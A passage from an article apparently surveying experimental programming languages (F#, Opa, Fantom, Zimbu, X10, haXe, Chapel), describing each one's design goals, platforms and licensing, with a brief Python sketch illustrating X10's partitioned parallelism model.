Enter F# (pronounced “F-sharp”), a Microsoft language designed to be both functional and practical. Because F# is a first-class language on the .Net Common Language Runtime (CLR), it can access all of the same libraries and features as other CLR languages, such as C# and Visual Basic.

F# code resembles OCaml somewhat, but it adds interesting syntax of its own. For example, numeric data types in F# can be assigned units of measure to aid scientific computation. F# also offers constructs to aid asynchronous I/O, CPU parallelization, and off-loading processing to the GPU.

After a long gestation period at Microsoft Research, F# now ships with Visual Studio 2010. Better still, in an unusual move, Microsoft has made the F# compiler and core library available under the Apache open source license; you can start working with it for free and even use it on Mac and Linux systems (via the Mono runtime).

Experimental programming language No. 5: Opa
Web development is too complicated. Even the simplest Web app requires countless lines of code in multiple languages: HTML and JavaScript on the client, Java or PHP on the server, SQL in the database, and so on.

Opa doesn’t replace any of these languages individually. Rather, it seeks to eliminate them all at once, by proposing an entirely new paradigm for Web programming. In an Opa application, the client-side UI, server-side logic, and database I/O are all implemented in a single language, Opa.

Opa accomplishes this through a combination of client- and server-side frameworks. The Opa compiler decides whether a given routine should run on the client, server, or both, and it outputs code accordingly. For client-side routines, it translates Opa into the appropriate JavaScript code, including AJAX calls.

Naturally, a system this integrated requires some back-end magic. Opa’s runtime environment bundles its own Web server and database management system, which can’t be replaced with stand-alone alternatives. That may be a small price to pay, however, for the ability to prototype sophisticated, data-driven Web applications in just a few dozen lines of code. Opa is open source and available now for 64-bit Linux and Mac OS X platforms, with further ports in the works.

Experimental programming language No. 6: Fantom
Should you develop your applications for Java or .Net? If you code in Fantom, you can take your pick and even switch platforms midstream. That’s because Fantom is designed from the ground up for cross-platform portability. The Fantom project includes not just a compiler that can output bytecode for either the JVM or the .Net CLI, but also a set of APIs that abstract away the Java and .Net APIs, creating an additional portability layer.

There are plans to extend Fantom’s portability even further. A Fantom-to-JavaScript compiler is already available, and future targets might include the LLVM compiler project, the Parrot VM, and Objective-C for iOS.

But portability is not Fantom’s sole raison d’être. While it remains inherently C-like, it is also meant to improve on the languages that inspired it. It tries to strike a middle ground in some of the more contentious syntax debates, such as strong versus dynamic typing, or interfaces versus classes. It adds easy syntax for declaring data structures and serializing objects. And it includes support for functional programming and concurrency built into the language.

Fantom is open source under the Academic Free License 3.0 and is available for Windows and Unix-like platforms (including Mac OS X).

Experimental programming language No. 7: Zimbu
Most programming languages borrow features and syntax from an earlier language. Zimbu takes bits and pieces from almost all of them. The brainchild of Bram Moolenaar, creator of the Vim text editor, Zimbu aims to be a fast, concise, portable, and easy-to-read language that can be used to code anything from a GUI application to an OS kernel.

Owing to its mongrel nature, Zimbu’s syntax is unique and idiosyncratic, yet feature-rich. It uses C-like expressions and operators, but has its own keywords, data types, and block structures. It supports memory management, threads, and pipes.

Portability is a key concern. Although Zimbu is a compiled language, the Zimbu compiler outputs ANSI C code, allowing binaries to be built only on platforms with a native C compiler.

Unfortunately, the Zimbu project is in its infancy. The compiler can build itself and some example programs, but not all valid Zimbu code will compile and run properly. Not all proposed features are implemented yet, and some are implemented in clumsy ways. The language specification is also expected to change over time, adding keywords, types, and syntax as necessary. Thus, documentation is spotty, too. Still, if you would like to experiment, preliminary tools are available under the Apache license.

Experimental programming language No. 8: X10
Parallel processing was once a specialized niche of software development, but with the rise of multicore CPUs and distributed computing, parallelism is going mainstream. Unfortunately, today’s programming languages aren’t keeping pace with the trend. That’s why IBM Research is developing X10, a language designed specifically for modern parallel architectures, with the goal of increasing developer productivity “times 10.”

X10 handles concurrency using the partitioned global address space (PGAS) programming model. Code and data are separated into units and distributed across one or more “places,” making it easy to scale a program from a single-threaded prototype (a single place) to multiple threads running on one or more multicore processors (multiple places) in a high-performance cluster.
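
The PGAS idea can be approximated in a few lines of any language. The Python sketch below is a concept illustration, not X10 itself (the helpers `make_places` and `local_sum` are invented for it): data is partitioned into shards standing in for “places,” each place computes only on the shard it owns, and the same program shape works whether there is one place or many.

```python
def make_places(data, nplaces):
    """Partition data across 'places'. In real PGAS each shard would
    live in the memory of a different core or cluster node; here the
    shards are just sublists."""
    return [data[i::nplaces] for i in range(nplaces)]

def local_sum(place_data):
    # A place-local computation: touches only the data this place owns.
    return sum(place_data)

data = list(range(100))

# One place: the single-threaded prototype.
assert local_sum(data) == 4950

# Four places: the same computation, partitioned. Each partial result
# is produced "at" its place; only the small partials cross places.
places = make_places(data, 4)
partials = [local_sum(p) for p in places]
assert sum(partials) == 4950
```

The point of the model is exactly this symmetry: scaling from one place to many changes where the code runs, not what the code says, which is what lets an X10 prototype grow into a cluster program.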

X10 code most resembles Java; in fact, the X10 runtime is available as a native executable and as class files for the JVM. The X10 compiler can output C++ or Java source code. Direct interoperability with Java is a future goal of the project.

For now, the language is evolving, yet fairly mature. The compiler and runtime are available for various platforms, including Linux, Mac OS X, and Windows. Additional tools include an Eclipse-based IDE and a debugger, all distributed under the Eclipse Public License.

Experimental programming language No. 9: haXe
Lots of languages can be used to write portable code. C compilers are available for virtually every CPU architecture, and Java bytecode will run wherever there’s a JVM. But haXe (pronounced “hex”) is more than just portable. It’s a multiplatform language that can target diverse operating environments, ranging from native binaries to interpreters and virtual machines.

Developers can write programs in haXe, then compile them into object code, JavaScript, PHP, Flash/ActionScript, or NekoVM bytecode today; additional modules for outputting C# and Java are in the works. Complementing the core language is the haXe standard library, which functions identically on every target, plus target-specific libraries to expose the unique features of each platform.

The haXe syntax is C-like, with a rich feature set. Its chief advantage is that it negates problems inherent in each of the platforms it targets. For example, haXe has strict typing where JavaScript does not; it adds generics and type inference to ActionScript; and it obviates the poorly designed, haphazard syntax of PHP entirely.

Although still under development, haXe is used commercially by its creator, the gaming studio Motion Twin, so it’s no toy. It’s available for Linux, Mac OS X, and Windows under a combination of open source licenses.

Experimental programming language No. 10: Chapel
In the world of high-performance computing, few names loom larger than Cray. It should come as no surprise, then, that Chapel, Cray’s first original programming language, was designed with supercomputing and clustering in mind.

Chapel is part of Cray’s Cascade Program, an ambitious high-performance computing initiative funded in part by the U.S. Defense Advanced Research Projects Agency (DARPA). Among its goals are abstracting parallel algorithms from the underlying hardware, improving their performance across architectures, and making parallel programs more portable.

Chapel’s syntax draws from numerous sources. In addition to the usual suspects (C, C++, Java), it borrows concepts from scientific programming languages such as Fortran and Matlab. Its parallel-processing features are influenced by ZPL and High-Performance Fortran, as well as earlier Cray projects.

One of Chapel’s more compelling features is its support for “multi-resolution programming,” which allows developers to prototype applications with highly abstract code and fill in details as the implementation becomes more fully defined.

Work on Chapel is ongoing. At present, it can run on Cray supercomputers and various high-performance clusters, but it’s portable to most Unix-style systems (including Mac OS X and Windows with Cygwin). The source code is available under a BSD-style open source license.